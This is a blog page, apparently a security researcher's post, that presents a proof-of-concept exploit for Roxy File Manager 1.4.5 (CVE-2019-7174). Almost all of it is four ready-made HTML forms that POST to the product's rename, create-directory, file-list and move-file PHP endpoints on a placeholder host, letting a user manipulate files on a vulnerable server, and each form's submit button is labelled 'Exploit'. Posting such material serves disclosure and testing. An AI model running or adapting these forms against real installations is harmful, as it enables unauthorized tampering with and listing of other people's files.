Roxy File Manager 1.4.5 POST Command Exploit & PoC | alicangonullu.biz

Roxy File Manager 1.4.5 POST Command Exploit & PoC

# Exploit Title: Roxy File Manager 1.4.5 POST Command Exploit & PoC

# Version: Roxy File Manager 1.4.5

# Tested on: Windows 10 x64

# Author : Ali Can Gönüllü

# CVE : CVE-2019-7174


//Rename File

<html>

<form method="POST" name="formlogin" action="http://host_name.pw/roxy/php/renamefile.php" >

<input name="f" type="text" id="f" value="/roxy/Uploads/file_name.pdf">

<input name="n" type="text" id="n" value="new_file_name.pdf">

<input name="gonder" type="submit" class="buton_text" id="__ML_ok" value="Exploit">

</form>

</html>

// Create Directory

<html>

<form method="POST" name="formlogin" action="http://host_name/roxy/php/createdir.php" >

<input name="d" type="text" id="f" value="/roxy/Uploads">

<input name="n" type="text" id="n" value="directory_name">

<input name="gonder" type="submit" class="buton_text" id="__ML_ok" value="Exploit">

</form>

</html>

// Echo File List

<form method="POST" name="formlogin" action="http://host_name.pw/roxy/php/fileslist.php" >

<input name="d" type="text" id="f" value="/roxy/Uploads">

<input name="type" type="hidden" id="f">

<input name="gonder" type="submit" class="buton_text" id="__ML_ok" value="Exploit">

</form>

</html>

// Move File

<form method="POST" name="formlogin" action="http://host_name.pw/roxy/php/movefile.php" >

<input name="f" type="text" id="f" value="/roxy/Uploads">

<input name="n" type="text" id="n" value="new_directory">

<input name="gonder" type="submit" class="buton_text" id="__ML_ok" value="Exploit">

</form>

</html>


Ali Can Gönüllü | Blog